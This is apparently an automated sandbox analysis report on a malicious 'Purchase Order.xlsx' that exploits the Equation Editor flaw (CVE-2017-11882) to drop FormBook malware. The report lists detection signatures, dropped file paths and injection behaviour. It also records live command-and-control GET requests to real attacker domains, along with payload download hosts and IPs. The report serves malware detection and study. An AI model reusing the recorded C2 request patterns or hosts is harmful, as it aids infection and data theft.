Analysis Report Purchase Order.xlsx

Overview

General Information

Sample Name: Purchase Order.xlsx
Analysis ID: 344798
MD5: 568ad30c526d3950e00385f41e08cdf2
SHA1: a2599b55c9c9a6b39c019bfeda57b38654c72f48
SHA256: ae24343193734ee532e142a8e64a7f27d5faf33667a7818743fd91baca01f99b
Tags: VelvetSweatshop, xlsx

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Drops PE files to the user root directory
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
Office Equation Editor has been started
PE file contains an invalid checksum
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: 5.2.acqyswhf.exe.220000.0.unpack Malware Configuration Extractor: FormBook {"Config: ": ["CONFIG_PATTERNS 0x79f3", "KEY1_OFFSET 0x1bb41", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1bc3e", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1a6b3", "searching hashes pattern", "Decrypted Function Hashes"
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe ReversingLabs: Detection: 20%
Multi AV Scanner detection for submitted file
Source: Purchase Order.xlsx ReversingLabs: Detection: 23%
Yara detected FormBook
Source: Yara match File source: 00000006.00000002.2204900441.00000000001F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2204979251.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2169563317.0000000000220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380114742.00000000000B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2204962869.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380245950.0000000000210000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000001.2167976340.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2380085574.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 5.2.acqyswhf.exe.220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.acqyswhf.exe.220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.1.dtz25z5e9sr.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.1.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.dtz25z5e9sr.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\scancopy87867678[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.2.acqyswhf.exe.220000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.1.dtz25z5e9sr.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.dtz25z5e9sr.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.22:49165 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: wntdll.pdb source: acqyswhf.exe, dtz25z5e9sr.exe, svchost.exe
Source: Binary string: svchost.pdb source: dtz25z5e9sr.exe, 00000006.00000002.2204947224.00000000002C4000.00000004.00000020.sdmp
Source: C:\Users\Public\vbc.exe Code function: 4_2_004059F0 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 4_2_004059F0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040659C FindFirstFileA,FindClose, 4_2_0040659C
Source: C:\Users\Public\vbc.exe Code function: 4_2_004027A1 FindFirstFileA, 4_2_004027A1
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C34005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 5_2_00C34005
Source: C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe Code function: 5_2_00C3C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 5_2_00C3C2FF

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 4x nop then pop esi 6_2_00415834
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 4x nop then pop edi 6_2_004162DD
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 4x nop then pop edi 6_1_004162DD
Source: C:\Users\user\AppData\Local\Temp\Nla\dtz25z5e9sr.exe Code function: 4x nop then pop esi 6_1_00415834
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then pop edi 10_2_000962DD
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then pop esi 10_2_00095834
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: cdn.discordapp.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 162.159.130.233:443
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 162.159.130.233:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 23.228.109.141:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 23.228.109.141:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49167 -> 23.228.109.141:80
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=jkLgRzxvTxu7277EKfJN7tKRHYJxZ3c6o/hCpD9wXnjOSj4zaLYT7gQTd+fjCtE9cXdA/Q==&9rO4=E4xhcD5XlJSXW HTTP/1.1 Host: www.land-il.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=BfKEObTbW9oeHG2CUMZ3KrmdYmDHtBO1kpWmA720me2b6REnQWjK/QX53PULeTYyqxmJdg==&9rO4=E4xhcD5XlJSXW HTTP/1.1 Host: www.fsjinhua.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=D+cSBfecKrY0H0Gt53ME+eVK9rvQq54hSBUKdB1Y0k0nsfYDitv2SyHvmR9bpLZA/9+mqA==&9rO4=E4xhcD5XlJSXW HTTP/1.1 Host: www.chenangopistolpermit.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=hrvp4+cUQU8zV/SJvc4Npds81eds1Wb4LfPiDx6kUcwrGKBrK/T3B2SdIv8rg9j1CS48fg==&9rO4=E4xhcD5XlJSXW HTTP/1.1 Host: www.streamelemeants.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=jfM0s3t3pF6231rQ9Ypgo/tIMSV8ijVp9KulJ4ArWd+XWOyrlsks5AwgkklZ8lU5NlnM6w==&9rO4=E4xhcD5XlJSXW HTTP/1.1 Host: www.mct.ltd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /j5an/?3fk=6SPexGd0ZJ0Mz+FJ+cy7OLUKwTeaGjB/WusfxloW69kYZYqYrDfxiIlikZagIGHK+b+BQQ==&9rO4=E4xhcD5XlJSXW HTTP/1.1 Host: www.bmtxm.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 162.159.130.233 162.159.130.233
Source: Joe Sandbox View IP Address: 81.17.18.195 81.17.18.195
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK
Source: Joe Sandbox View ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\205620C7.emf Jump to behavior
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Wed, 27 Jan 2021 06:17:46 GMT Server: nginx/1.19.5 Content-Type: text/html; charset=iso-8859-1 Content-Length: 315 host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: explorer.exe, 00000008.00000000.2195645892.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2195645892.000000000A330000.00000008.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: vbc.exe, 00000004.00000002.2182149454.0000000002834000.00000004.00000001.sdmp, acqyswhf.exe, 00000005.00000002.2176773988.0000000003B03000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2181625613.00000000039F4000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2196077802.000000000B320000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2191369780.000000000856E000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2191235298.0000000008471000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerp
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2181773215.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2195827526.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
